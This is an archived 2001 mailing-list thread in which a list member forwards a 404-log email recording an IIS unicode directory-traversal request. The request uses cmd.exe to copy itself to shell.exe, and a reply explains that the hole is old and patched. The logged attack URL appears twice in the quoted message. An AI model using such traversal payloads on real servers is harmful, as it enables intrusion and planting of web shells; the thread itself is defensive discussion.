[UFO Chicago] New Attack Against MS Webservers?
Brian McGroarty
bvmcg@yahoo.com
Thu, 13 Sep 2001 07:05:44 -0700 (PDT)
Old - that's been patched.
IIS had a hole where unicode could be used to get periods and
slashes into an URL. The filters which should have prohibited
this weren't unicode savvy, so IIS permitted execution of
anything as a script.
by the by - any reason the list isn't in a "reply-to:" - ?
--- Nate Riffe <inkblot@geocities.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> I just got the email below from my 404.php script. Does
> anyone know
> whether this is another exploit of an already known bug or a
> new bug?
>
> - -Nate
>
> -
>
------------------------------------------------((\))<----------------------
> Nate Riffe | PGP public key available at:
> http://www.movealong.org/ |
> http://www.movealong.org/~inkblot/pgp-key.asc
> inkblot@geocities.com |
> | Secure your email today!
>
> - ---------- Forwarded message ----------
> Date: Thu, 13 Sep 2001 08:39:33 -0500 (CDT)
> From: www-data <www-data@movealong.dhs.org>
> To: inkblot@maverick.inknet
> Subject: 404 Not Found at
>
>
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.
> exe+c:\\inetpub\\scripts\\shell.exe
>
> Hi Nate,
>
> Hey, this is your 404.php script. 4.3.18.212 found a page
> that doesn't
> exist at
>
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\shell.exe.
> What a conundrum!
>
> Regards,
> 404.php
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGPfreeware 5.0i for non-commercial use
> Charset: noconv
>
>
iQA/AwUBO6C4W4jJNqeHAZR4EQJ+vACg3R0kIkPvFh3qLXy6M4pvp0JCgrMAoMNK
> M2FnEfTp3HF7UVsBGI4kpXMR
> =ZpEC
> -----END PGP SIGNATURE-----
>
>
> _______________________________________________
> UFO Chicago -- Users of Free Operating Systems
> Free Software Rules -- Proprietary Drools!
> http://ufo.chicago.il.us/cgi-bin/mailman/listinfo/ufo
__________________________________________________
Terrorist Attacks on U.S. - How can you help?
Donate cash, emergency relief information
http://dailynews.yahoo.com/fc/US/Emergency_Information/